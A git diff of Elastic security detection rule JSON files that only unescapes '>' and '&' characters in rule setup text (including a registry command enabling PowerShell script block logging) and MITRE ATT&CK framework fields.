- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -85,7 +85,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_6.json b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_6.json
index 9b81f29efb3..0ec88cd7e4e 100644
--- a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_6.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "92984446-aefb-4d5e-ad12-598042ca80ba",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -85,7 +85,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_7.json b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_7.json
index 44476cd350d..a369d40560f 100644
--- a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_7.json
+++ b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_7.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "92984446-aefb-4d5e-ad12-598042ca80ba",
- "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
+ "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -85,7 +85,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_5.json b/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_5.json
index d10b1104de0..ee4809b60f4 100644
--- a/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_5.json
@@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_6.json b/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_6.json index 20f08a97e91..cd7c944996d 100644 --- a/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_6.json +++ b/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_6.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_7.json b/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_7.json index 5d65a49c865..1c3def6c57a 100644 --- a/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_7.json +++ b/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_7.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_102.json b/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_102.json index 08a36c81a98..f2a2ee1a71f 100644 --- a/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_102.json +++ b/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_102.json 
@@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_103.json b/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_103.json index 9d9bf69b2e4..aa4b3dd206d 100644 --- a/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_103.json +++ b/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_104.json b/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_104.json index 27e67ee7774..6052f8b07df 100644 --- a/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_104.json +++ b/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_104.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", 
diff --git a/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_205.json b/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_205.json index 79e1fe8385c..4e071471db4 100644 --- a/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_205.json +++ b/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_205.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_101.json b/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_101.json index 319d54caa23..cb9308d0c51 100644 --- a/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_101.json +++ b/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_101.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_102.json b/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_102.json index b4393926b2a..1d0d278b698 100644 --- a/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_102.json +++ b/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_102.json 
@@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_103.json b/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_103.json index 392f702c517..b88836e21bf 100644 --- a/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_103.json +++ b/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_103.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_203.json b/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_203.json index 415671dff58..2240e007fbd 100644 --- a/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_203.json +++ b/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_203.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_105.json b/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_105.json index 74850590a2f..a0433a640ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_105.json 
@@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_106.json b/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_106.json index 3aef4e11a82..ca2c6c63200 100644 --- a/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_107.json b/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_107.json index 2ac45698c77..cfb7750e06e 100644 --- a/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_107.json +++ b/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_107.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_208.json b/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_208.json index 8ab0cb15f31..18cad8cb17c 100644 --- a/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_208.json +++ b/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_208.json 
@@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_104.json b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_104.json index fe21eb7ca91..3caae287c52 100644 --- a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_104.json +++ b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_104.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "93b22c0a-06a0-4131-b830-b10d5e166ff4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_105.json b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_105.json index 2174b2bbcae..d142757781b 100644 
--- a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_105.json +++ b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_105.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "93b22c0a-06a0-4131-b830-b10d5e166ff4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_106.json b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_106.json index 3d325d8e508..142dfb99b7f 100644 --- a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_106.json +++ b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_106.json 
@@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "93b22c0a-06a0-4131-b830-b10d5e166ff4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_107.json b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_107.json index 7fa99b7aeac..38bfb4c6e7e 100644 --- a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_107.json +++ b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_107.json 
@@ -61,7 +61,7 @@ ], "risk_score": 47, "rule_id": "93b22c0a-06a0-4131-b830-b10d5e166ff4", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_103.json b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_103.json index 5805e201cc7..e647a535c2d 100644 --- a/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_103.json +++ b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_103.json 
@@ -44,7 +44,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_104.json b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_104.json index 4cdfd789666..6b5fe580f46 100644 --- a/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_104.json +++ b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_104.json @@ -43,7 +43,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_105.json b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_105.json index 1e17368d21f..e69c604921f 100644 --- a/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_105.json +++ b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_105.json @@ -44,7 +44,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_203.json b/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_203.json index da404946d63..404b64dce5a 100644 --- a/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_203.json +++ b/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_203.json 
@@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_204.json b/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_204.json index 3fcca900c1f..fe290a261ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_204.json +++ b/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_204.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_205.json b/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_205.json index 91f0362f0d8..2aa23f0c03f 100644 --- a/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_205.json +++ b/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_205.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_101.json b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_101.json index 041bd7d2946..71c78f1f4d9 100644 --- a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_101.json +++ b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_101.json 
@@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_102.json b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_102.json index a46154392d0..be7d993cc86 100644 --- a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_102.json +++ b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_102.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_103.json b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_103.json index 499b2484bb1..66c18d083fd 100644 --- a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_103.json +++ b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_103.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_104.json b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_104.json index 48f67187bdb..273d2f8b737 100644 --- a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_104.json +++ b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_104.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_204.json b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_204.json index ff133f4216a..fc16a503663 100644 --- a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_204.json +++ b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_204.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -95,7 +95,7 @@ ] }, { - 